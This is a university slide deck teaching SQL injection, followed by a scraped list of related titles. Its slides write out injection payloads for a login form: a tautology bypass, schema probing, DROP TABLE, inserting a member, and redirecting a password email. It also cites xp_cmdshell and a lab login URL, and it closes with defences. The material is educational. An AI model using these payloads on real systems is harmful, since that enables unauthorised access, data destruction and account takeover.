sql injection attack

SQL Injection AttackModus operandi. . .

Sridhar.V.Iyer

[email protected]

Department of Computer & Informations Sciences

Syracuse University, Syracuse, NY-13210

SQL Injection Attack – p. 1

SQLWhat is SQL?


SQLWhat is SQL?

Where is it used?


SQLWhat is SQL?

Where is it used?

Why do we use it?


Web Technologies

Platform: Linux, OpenBSD, FreeBSD, Solarisand . . . Windows.


Web Technologies


Web Servers: Apache, LightTPD, Yaws, Tux,IIS


Web Technologies



Databases: MySQL, PostgreSQL, Firebird,MSSQL server


Web Technologies




Scripting Languages: Php, CGI/Perl,SmallTalk, ASP.NET


Web Technologies




Scripting Languages: Php, CGI/Perl,SmallTalk, ASP.NET

Other Alternatives: J2EE/JSP etc.


Modus Operandi...Steve Friedl’s way

Know your enemy



Know your enemy

Find his/her weakness



Know your enemy

Find his/her weakness

Attack his/her weakness


Anatomy of theAttack

The constructed SQL should be like

SELECT list FROM table WHERE field=’$EMAIL’;





What if I give my own email and complete the

query for form?

SELECT list FROM table WHERE field=’[email protected]’’;





What if I give my own email and complete the

query for form?

SELECT list FROM table WHERE field=’[email protected]’’;

What is the output?


Lets dig deeper. . .

Lets create a valid query

SELECT list FROM table WHERE field=’something’ or ’x’=’x’;


Lets dig deeper. . .

Lets create a valid query

SELECT list FROM table WHERE field=’something’ or ’x’=’x’;

Result?Your login information has been mailed to

[email protected]

Dont recognize that email address

Server error!!


Lets behaveourselves

Schema field mapping: Figure out the

tentative field list

SELECT list FROM table WHERE field=’x’ AND email IS NULL;–’;






Find out as many fields as possible in a

similar fashion.






Find out as many fields as possible in a

similar fashion.

Find out the table name. How?



We can try the query SELECT COUNT(*) FROM tablename;

SELECT . . . email=’x’ AND 1=(SELECT COUNT(*) FROM tablename);–’;





Again educated guess is required. The sites

wont have cryptic table names.





Again educated guess is required. The sites

wont have cryptic table names.

Are we interested in this table?SELECT list FROM table WHERE field=’x’ AND members.email IS NULL;–’;


If the databasewasn’t readonly??

Bazoooooka

SELECT . . . =’x’; DROP TABLE members;–’;



Bazoooooka


Add a new member

SELECT . . . =’x’; INSERT INTO members{. . . } VALUES {. . . };–’;



Bazoooooka


Add a new member

SELECT . . . =’x’; INSERT INTO members{. . . } VALUES {. . . };–’;

Mail me the passwordSELECT . . . =’x’; UPDATE members

SET [email protected] WHERE [email protected]’;


Other MethodsUse xp_cmdshell: Something like Macro forMS Word

Map Database structure: Do more of the stuffwe already discussed for just one form


Time for some actionhttp://128.230.212.170/apache2-default/login.php


http://128.230.212.170/apache2-default/login.php

How not to do thewrong thing

Sanitize the Input



Sanitize the Input

Quotesafe the Input



Sanitize the Input

Quotesafe the Input

Use bounded parameters



Sanitize the Input

Quotesafe the Input


Limit Database Permission and segregateusers



Sanitize the Input

Quotesafe the Input



Use Stored procedures for database access



Sanitize the Input

Quotesafe the Input




Isolate the Webserver



Sanitize the Input

Quotesafe the Input




Isolate the Webserver

Configure Error Reporting


DISCLAIMERAny actual or imagined resemblance to ourfar more civilized world today is unintentionaland purely coincidental

The purpose of this presentation is purelyeducational


Referencehttp://www.unixwiz.net/techtips/sql-injection.html

Php Manual.

MySQL Manual.

Google. . . ofcourse.

This site has been created using prosperpackage on LATEX


ThanksQuestions?


sql injection attack

Documents

The basic of Blind SQL Injection-pride - hackerschool.orghackerschool.org/.../The_basic_of_Blind_SQL_Injection_PRIDE.pdf · Blind SQL Injection 은 평범한 SQL Injection 과 같이

Anti SQL Injection

Foresics analusis of SQL injection attack

Advanced SQL Injection in MySQL - alirecaiyekta.comalirecaiyekta.com/uploads/Advanced-SQL-Injection-in-MySQL-GERM… · SQL Injection ist eine Technik, die einem Angreifer ermöglicht,

SQL Injection Seg Info

Advanced Sql Injection

Injecao SQL - SQL Injection II

Step by Step SQL Injection Attack - mirror.smkn1pml.sch.idmirror.smkn1pml.sch.id/Majalah/Buku Komputer Elexmedia/PDF Buku... · SQL Injection Attack ... Setelah melakukan instalasi

SQL Injection 공격

6934868 SQL Injection

SQL Injection AN4976015 洪志修 2009/12/30. Outline SQL? SQL Injection? 防範

최싞글로벌사이버공격동향및 진화하는봇의대응 · attack continues to be SQL injection, which accounted for 51% of the attacks seen by Akamai’s Kona Web Application

Segurança de Aplicações e Banco de Dados Gestão de ...tracanelli.com.br/l/docs/gsi/SADB/SABD-patrick.pdf · “SQL injection attacks are a type of injection attack, in which SQL

2. SQL Injection

Eine Präsentation von Benedikt Streitwieser und …uhl/PScrypt16...•Blind SQL Injection: •Content-based Blind SQL Injection •Time-based Blind SQL Injection •SQL Injection

sql injection avançado

SQL Injection Lab 5477

Introdução à SQL Injection

SQL Injection

46735899 SQL Injection

GRIS - SQL Injection

Seguridad sql injection

Injection sql

Sql, Sql Injection ve Sqlmap Kullanımı

SQL INJECTION - web.bilecik.edu.trweb.bilecik.edu.tr/.../files/2018/06/Mehmet-TUNCER-Sql-injection.pdf · 1 SQL Injection Saldırılarına Giriş SQL Injection saldırısı, web uygulamalarının

Sql injection diknas.go.id

PRÁCTICA SQL INJECTION

3P- SQL Injection

Kommunales Rechenzentrum Niederrhein (KRZN) Friedrich ... · W3AF Web Application Attack and Audit Framework W3AF findet gängigste Schwachstellen in Websites: - XSS - SQL Injection

METODOLOGÍA DE PRUEBAS DE INYECCIÓN SQL PARA ...apuntesdeinvestigacion.bucaramanga.upb.edu.co/wp-content/...2016/03/03 · SQL injection, attack, security, Web applications. 1

Practica SQL- Injection